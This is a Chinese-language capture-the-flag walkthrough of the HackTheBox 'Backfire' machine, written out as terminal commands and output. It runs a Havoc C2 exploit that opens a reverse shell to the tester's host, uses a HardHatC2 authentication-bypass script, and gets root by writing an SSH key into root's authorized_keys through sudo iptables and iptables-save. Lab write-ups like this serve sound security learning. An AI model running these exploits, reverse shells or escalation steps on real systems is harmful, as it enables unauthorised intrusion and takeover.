HackTheBox Backfire Walkthrough

发表评论

系统:Linux
内容:havoc CVE,hasdcat CVE, iptables

扫描端口,发现3个。

~/D/b $auto_nmap.sh $IP
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
|   256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA)
|_  256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519)
443/tcp  open  ssl/http nginx 1.22.1
| tls-alpn:
|   http/1.1
|   http/1.0
|_  http/0.9
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.22.1
| ssl-cert: Subject: commonName=127.0.0.1/organizationName=tech co/stateOrProvinceName=Florida/countryName=US
| Subject Alternative Name: IP Address:127.0.0.1
| Issuer: commonName=127.0.0.1/organizationName=tech co/stateOrProvinceName=Florida/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-12-15T08:39:10
| Not valid after:  2027-12-15T08:39:10
| MD5:   f4d3:45cf:27fc:1c59:f657:a834:c8dc:772f
|_SHA-1: b52a:40ad:891e:fa53:f34d:fa6f:1f60:50ff:4c10:c994
|_http-title: 404 Not Found
8000/tcp open  http     nginx 1.22.1
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME               FILENAME
| 1559  17-Dec-2024 11:31  disable_tls.patch
| 875   17-Dec-2024 11:34  havoc.yaotl
|_
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

8000端口下有两个文件,下载后发现是关于havoc框架的代码。搜索havoc相关的CVE,最后在下面的地址找到一个最方便的。

https://gist.github.com/pich4ya/bda16a3b2104bea411612f20d536174b

运行exp。

~/D/b $python3 havoc_ssrc2rc2.py  --target https://$IP -l 10.10.16.11  --c2user ilya --c2pass 'CobaltStr1keSuckz!'
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
63157
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!

本地监听的端口可以得到shell。

~/D/b $nc -nlvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.49 52018
bash: cannot set terminal process group (75597): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ whoami
whoami
ilya

最初在ilya的.ssh目录下是有id_rsa的,后来再次登录没有了,只能上传id_rsa.pub,便于登录ssh。在用户目录下发现一段提示,估计就是要获得用户sergej的权限,需要利用hardhat c2相关的漏洞。

ilya@backfire:~$ ls -la
ls -la
total 44
drwx------  6 ilya ilya 4096 Jan 19 05:00 .
drwxr-xr-x  4 root root 4096 Sep 28 20:05 ..
lrwxrwxrwx  1 root root    9 Dec 12 10:14 .bash_history -> /dev/null
-rw-r--r--  1 ilya ilya  220 Sep 27 16:43 .bash_logout
-rw-r--r--  1 ilya ilya 3526 Sep 27 16:43 .bashrc
drwxr-xr-x  2 root root 4096 Sep 30 07:39 files
-rw-r--r--  1 root root  174 Sep 28 23:02 hardhat.txt
drwxr-xr-x 10 ilya ilya 4096 Sep 27 19:18 Havoc
drwxr-xr-x  3 ilya ilya 4096 Jan 19 05:00 .local
-rw-r--r--  1 ilya ilya  807 Sep 27 16:43 .profile
drwxr-xr-x  2 ilya ilya 4096 Jan 19 22:06 .ssh
-rw-r-----  1 root ilya   33 Jan 19 03:39 user.txt
ilya@backfire:~$ cat hardhat.txt
Sergej said he installed HardHatC2 for testing and  not made any changes to the defaults
I hope he prefers Havoc bcoz I don't wanna learn another C2 framework, also Go > C#
...
ilya@backfire:~/.ssh$ ls -la
ls -la
total 20
drwxr-xr-x 2 ilya ilya 4096 Jan 19 22:06 .
drwx------ 6 ilya ilya 4096 Jan 19 05:00 ..
-rw------- 1 ilya ilya 1956 Jan 19 22:08 authorized_keys
-rw------- 1 ilya ilya 3381 Jan 19 22:06 id_rsa
-rw-r--r-- 1 ilya ilya  739 Jan 19 22:06 id_rsa.pub

查看本机端口,7096和5000两个公开端口刚才是没有扫出来的。

ilya@backfire:/tmp$ netstat -ntulp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      -      
tcp        0      0 127.0.0.1:40056         0.0.0.0:*               LISTEN      -      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -      
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -      
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -      
tcp        0      0 0.0.0.0:7096            0.0.0.0:*               LISTEN      -      
tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN      -      
tcp6       0      0 :::22                   :::*                    LISTEN      -      
udp        0      0 0.0.0.0:68              0.0.0.0:*

由于能够登录ssh了,直接端口转发。

~/D/b $ssh -L 7096:127.0.0.1:7096 ilya@$IP
...
~/D/b $ssh -L 5000:127.0.0.1:5000 ilya@$IP

转发到本地后再次扫描这两个端口,果然是HardHat服务。

~/D/b $nmap -sV -sC -Pn -p5000,7096 127.0.0.1
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-20 06:07 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000025s latency).

PORT     STATE SERVICE  VERSION
5000/tcp open  ssl/http Microsoft Kestrel httpd
| ssl-cert: Subject: commonName=HardHat TeamServer
| Not valid before: 2025-01-20T04:50:04
|_Not valid after:  2030-01-20T04:50:04
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Kestrel
|_http-title: Site doesn't have a title.
7096/tcp open  ssl/http Microsoft Kestrel httpd
|_http-trane-info: Problem with XML parsing of /evox/about
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Kestrel
| ssl-cert: Subject: commonName=HardHat Client
| Subject Alternative Name: DNS:localhost, IP Address:0.0.0.0
| Not valid before: 2024-09-29T00:38:50
|_Not valid after:  2029-09-29T00:38:50

使用浏览器可以登录7096端口,但是没有用户名和密码。

在网上搜索,可以查到hardhat有个bypass auth的CVE。下载后运行,随后就在hardhat服务中建立了新用户,密码同用户名。

~/D/b $python3 auth_bypass.py -u kali
[+] User created !
[+] Use kali as the username and password to login in HardHat C2!

再次登录,果然可以进入控制面板。

按如下路径,运行shell代码:Interact-->Terminal--> +

本地监听端口可以得到反弹shell。

~/D/b $rlwrap nc -nlvp 2234
Listening on 0.0.0.0 2234
Connection received on 10.10.11.49 38138
whoami
sergej

查看sudo -l。

sergej@backfire:~$ sudo -l
Matching Defaults entries for sergej on backfire:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User sergej may run the following commands on backfire:
    (root) NOPASSWD: /usr/sbin/iptables
    (root) NOPASSWD: /usr/sbin/iptables-save

这里要使用iptables写防火墙规则,在comment里加上pub_key的内容,再利用iptables-save功能覆盖root的authorized_keys来实现提权。本地生成的ssh key时,由于rsa的pub key过长,会被截断,要使用长度较短的ed25519算法。

本机生成key的命令如下。

~/D/b $ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519

靶机运行sudo命令如下。

sergej@backfire:/tmp$ sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 <your pub key> kali@mykali\n'
sergej@backfire:/tmp$ sudo iptables-save -f /root/.ssh/authorized_keys

本机再次尝试登录ssh。

~/D/b $ssh -i ~/.ssh/id_ed25519 root@$IP
Linux backfire 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
root@backfire:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
backfire
Post Views: 1,306
1

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注